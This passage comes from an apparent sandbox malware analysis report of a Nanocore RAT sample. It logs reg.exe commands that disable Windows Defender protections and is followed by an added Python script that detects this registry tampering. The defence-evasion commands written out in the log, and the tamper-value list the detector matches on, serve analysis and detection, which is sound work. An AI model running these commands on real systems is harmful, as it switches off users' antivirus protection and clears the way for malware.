          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate

          General

          Start time:17:34:14
          Start date:12/05/2021
          Path:C:\Windows\System32\reg.exe
          Wow64 process (32bit):false
          Commandline:Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableOnAccessProtection' /t REG_DWORD /d '1' /f
          Imagebase:0x7ff669b10000
          File size:72704 bytes
          MD5 hash:E3DACF0B31841FA02064B4457D44B357
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate

          General

          Start time:17:34:16
          Start date:12/05/2021
          Path:C:\Windows\System32\reg.exe
          Wow64 process (32bit):false
          Commandline:Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableScanOnRealtimeEnable' /t REG_DWORD /d '1' /f
          Imagebase:0x7ff669b10000
          File size:72704 bytes
          MD5 hash:E3DACF0B31841FA02064B4457D44B357
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate

          General

          Start time:17:34:18
          Start date:12/05/2021
          Path:C:\Windows\System32\reg.exe
          Wow64 process (32bit):false
          Commandline:Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' /v 'DisableAntiSpyware' /t REG_DWORD /d '1' /f
          Imagebase:0x7ff669b10000
          File size:72704 bytes
          MD5 hash:E3DACF0B31841FA02064B4457D44B357
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate

          General

          Start time:17:34:19
          Start date:12/05/2021
          Path:C:\Windows\System32\reg.exe
          Wow64 process (32bit):false
          Commandline:Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' /v 'DisableRoutinelyTakingAction' /t REG_DWORD /d '1' /f
          Imagebase:0x7ff669b10000
          File size:72704 bytes
          MD5 hash:E3DACF0B31841FA02064B4457D44B357
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate

          General

          Start time:17:34:21
          Start date:12/05/2021
          Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          Wow64 process (32bit):true
          Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
          Imagebase:0xc60000
          File size:207360 bytes
          MD5 hash:A54512682E96BF7475C189E0D85C4B1F
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:.Net C# or VB.NET
          Yara matches:
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000002.377390680.0000000004421000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000010.00000002.377390680.0000000004421000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000002.377356574.0000000003421000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000010.00000002.377356574.0000000003421000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000002.376298581.0000000000C62000.00000002.00020000.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000002.376298581.0000000000C62000.00000002.00020000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000010.00000002.376298581.0000000000C62000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000000.357721819.0000000000C62000.00000002.00020000.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000000.357721819.0000000000C62000.00000002.00020000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000010.00000000.357721819.0000000000C62000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Kevin Breen <kevin@techanarchy.net>
          Antivirus matches:
          • Detection: 100%, Avira
          • Detection: 100%, Joe Sandbox ML
          • Detection: 80%, Virustotal
          • Detection: 98%, ReversingLabs
          Reputation:low

          General

          Start time:17:34:48
          Start date:12/05/2021
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff61de10000
          File size:625664 bytes
          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
          Has elevated privileges:true
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
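          The process list above shows the batch file dropped by Main.exe running one reg.exe query followed by six reg.exe add commands within seven seconds (17:34:12 to 17:34:19), each writing a Disable* value of 1 under HKLM\SOFTWARE\Policies\Microsoft\Windows Defender or its Real-Time Protection subkey; the preceding query of HKU\S-1-5-19\Environment is a common batch-file elevation check, since only an elevated process can read the LOCAL SERVICE hive, and the report confirms the chain ran with administrator privileges. The Python below is an added example, not part of the Joe Sandbox report. It parses those command lines and applies the two checks a detection engineer would write from this run: a content rule (reg add of a known Defender kill-switch value under the policy key with non-zero data) and a rate rule (at least three reg add children from one parent inside 60 s). The event layout, the parent image (the report shows no parent column for these processes), the value list and both thresholds are this example's assumptions.

```python
"""Detection of Windows Defender policy tampering through reg.exe.

Added example, not part of the Joe Sandbox report. The command lines are
those listed under "System Behavior" above; the event layout, the parent
image, the value list and the thresholds are this example's assumptions.
"""
import shlex
from datetime import datetime, timedelta

DEFENDER_POLICY = r"hklm\software\policies\microsoft\windows defender"
# Assumption: policy values worth alerting on when written with a non-zero value.
TAMPER_VALUES = {
    "disableantispyware", "disablerealtimemonitoring", "disablebehaviormonitoring",
    "disableonaccessprotection", "disablescanonrealtimeenable", "disableroutinelytakingaction",
}
CMD = r"C:\Windows\System32\cmd.exe"
REG = r"C:\Windows\System32\reg.exe"

# Constructed process-creation events: (timestamp, image, command_line, parent_image).
# Command lines are copied from the report; the parent column is an assumption.
EVENTS = [
    ("2021-05-12 17:34:10", CMD, r"'C:\Windows\system32\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\DFA1.tmp\DFA2.tmp\DFA3.bat C:\Users\user\Desktop\Main.exe'", r"C:\Users\user\Desktop\Main.exe"),
    ("2021-05-12 17:34:10", REG, r"Reg.exe query 'HKU\S-1-5-19\Environment'", CMD),
    ("2021-05-12 17:34:12", REG, r"Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' /v 'DisableAntiSpyware' /t REG_DWORD /d '1' /f", CMD),
    ("2021-05-12 17:34:13", REG, r"Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableBehaviorMonitoring' /t REG_DWORD /d '1' /f", CMD),
    ("2021-05-12 17:34:14", REG, r"Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableOnAccessProtection' /t REG_DWORD /d '1' /f", CMD),
    ("2021-05-12 17:34:16", REG, r"Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableScanOnRealtimeEnable' /t REG_DWORD /d '1' /f", CMD),
    ("2021-05-12 17:34:18", REG, r"Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' /v 'DisableAntiSpyware' /t REG_DWORD /d '1' /f", CMD),
    ("2021-05-12 17:34:19", REG, r"Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' /v 'DisableRoutinelyTakingAction' /t REG_DWORD /d '1' /f", CMD),
    # Constructed control rows that must not fire: a benign query and a re-enable (data 0).
    ("2021-05-12 17:40:00", REG, r"Reg.exe query 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion' /v ProductName", CMD),
    ("2021-05-12 17:41:00", REG, r"Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' /v DisableAntiSpyware /t REG_DWORD /d 0 /f", CMD),
]


def split_cmdline(command_line):
    """Split on whitespace honouring both quote styles; backslashes are path separators, not escapes."""
    lex = shlex.shlex(command_line, posix=True)
    lex.whitespace_split = True
    lex.commenters = ""
    lex.escape = ""
    return list(lex)


def parse_reg(command_line):
    """Return {'op', 'key', 'value', 'data'} for a reg.exe command line, or None if it is not reg.exe."""
    tokens = split_cmdline(command_line)
    if len(tokens) < 3 or tokens[0].rsplit("\\", 1)[-1].lower() not in ("reg", "reg.exe"):
        return None
    parsed = {"op": tokens[1].lower(), "key": tokens[2], "value": None, "data": None}
    i = 3
    while i < len(tokens):
        flag = tokens[i].lower()
        if flag in ("/v", "/d") and i + 1 < len(tokens):
            parsed["value" if flag == "/v" else "data"] = tokens[i + 1]
            i += 2
        else:
            i += 1
    return parsed


def is_defender_tamper(parsed):
    """True for `reg add` of a known kill-switch value under the Defender policy key with non-zero data."""
    if not parsed or parsed["op"] != "add" or not parsed["value"]:
        return False
    key = parsed["key"].lower().replace("hkey_local_machine", "hklm")
    try:
        data = int(parsed["data"] or "0", 0)  # accepts '1' and '0x1'
    except ValueError:
        return False
    return key.startswith(DEFENDER_POLICY) and parsed["value"].lower() in TAMPER_VALUES and data != 0


def detect_defender_tampering(events):
    """Events whose command line disables a Defender protection through policy."""
    hits = []
    for ts, _image, cmdline, parent in events:
        parsed = parse_reg(cmdline)
        if is_defender_tamper(parsed):
            hits.append({"time": ts, "parent": parent, "key": parsed["key"], "value": parsed["value"]})
    return hits


def reg_add_bursts(events, threshold=3, window=timedelta(seconds=60)):
    """Parents with at least `threshold` `reg add` children inside `window`, with the peak count."""
    adds = sorted((datetime.fromisoformat(ts), parent) for ts, _, cmd, parent in events
                  if (parse_reg(cmd) or {}).get("op") == "add")
    bursts = {}
    for i, (t0, parent) in enumerate(adds):
        count = sum(1 for t, p in adds[i:] if p == parent and t - t0 <= window)
        if count >= threshold:
            bursts[parent] = max(bursts.get(parent, 0), count)
    return bursts


if __name__ == "__main__":
    for hit in detect_defender_tampering(EVENTS):
        print(hit["time"], hit["value"], "<-", hit["key"])
    print("reg add bursts:", reg_add_bursts(EVENTS))
```

          Both checks fire on this run: six tamper writes (DisableAntiSpyware twice) and a burst of six reg add children from one cmd.exe within seven seconds. Where Tamper Protection is enabled, Defender ignores these policy writes, so a reg.exe that exits cleanly is not evidence that protection actually went down; the attempt itself is the signal, and the re-enable row with data 0 is deliberately left unflagged so that remediation scripts do not trip the rule.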

          Disassembly

          Code Analysis
